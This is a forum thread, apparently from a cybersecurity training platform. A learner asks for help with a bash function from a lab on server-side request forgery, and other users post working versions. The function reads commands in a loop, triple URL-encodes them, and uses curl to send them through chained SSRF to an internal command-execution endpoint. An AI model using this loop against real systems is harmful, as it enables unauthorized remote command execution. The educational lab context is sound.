In the ssrf exploitation example section at the end of the section htb academy give you a bash function to use in order to gain rce via ssrf. The issue i’m having is when i try to use the function, i get nothing but syntax errors and i do not know enough to sort out why and when i looked up function writing via bash terminal, nothing stood out. So i’m asking you pros for help
──(root㉿kali)-[~]
└─# function rce() {
function> while true; do
function while> echo -n "# "; read cmd
function while> ecmd=$(echo -n $cmd | jq -sRr @uri | jq -sRr @uri | jq -sRr @uri)
function while> curl -s -o - "http://<TARGET IP>/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=${ecmd}"
function while> echo ""
function while> done
function> }
bash: syntax error near unexpected token `>'
bash: syntax error near unexpected token `>'
bash: syntax error near unexpected token `>'
bash: syntax error near unexpected token `>'
bash: syntax error near unexpected token `>'
bash: syntax error near unexpected token `>'
bash: syntax error near unexpected token `>'
and when i try to write it out without creating new lines, I still get syntax errors.
┌──(root㉿kali)-[~]
└─# function rce() { function> while true; do function while> echo -n "# "; read cmd function while> ecmd=$(echo -n $cmd | jq -sRr @uri | jq -sRr @uri | jq -sRr @uri) function while> curl -s -o - "http://<TARGET IP>/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=${ecmd}" function while> echo "" function while> done function> }
bash: syntax error near unexpected token `>'
any help would be great, thanks!
Hey, I have fielded a few questions about this bash function, so I will leave this here. I would recommend just throwing it into a script instead:
#!/bin/bash
function rce() {
while true; do
echo -n "# "; read cmd
ecmd=$(echo -n $cmd | jq -sRr @uri | jq -sRr @uri | jq -sRr @uri)
curl -s -o - "http://<TARGET IP>/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=${ecmd}"
echo ""
done
}
rce
I have always found that I make mistakes while trying to type it into the cli like the example shows. Hope this helps.
-onthesauce
2 Likes
Thanks man, I actually thought about putting into a script but i wasn’t sure if it could be used the same way or if i would have to do something different to get it working. Although i’ve been using Linux for a long time, i’ve only written basic scripts that are pretty much just a bunch of single line commands put into a text file. So functions in bash is new to me and is something i’m going to have to work on, Thanks again bro! Happy new year!
Another way I thought about after creating this post and actually just tried out is by using ChatGPT. And no surprise it works flawlessly, Its also the same as whats in your script.
So for anyone who doesm’t want to create a bash script, just use this or chatgpt to fix the example.
function rce() {
while true; do
echo -n "# "; read cmd
ecmd=$(echo -n "$cmd" | jq -sRr @uri | jq -sRr @uri | jq -sRr @uri)
curl -s -o - "http://<TARGET IP>/load?q=http://internal.app.local/load?q=http:////127.0.0.1:5000/runme?x=${ecmd}"
echo ""
done
}
1 Like
You have come in so clutch during these modules.
Going to have to buy you a beer.
I am trying to pay it forward myself being involved here, being a new user, but these forums and namely your specific, guided, and informational ( educational ) might actually save my life in the future. thank you.
1 Like
Hey I really appreciate the kind words. I am glad that I have been able to make a positive impact on your journey through the modules. Paying it forward is really the key to the forums.
You are very welcome!
-onthesauce
1 Like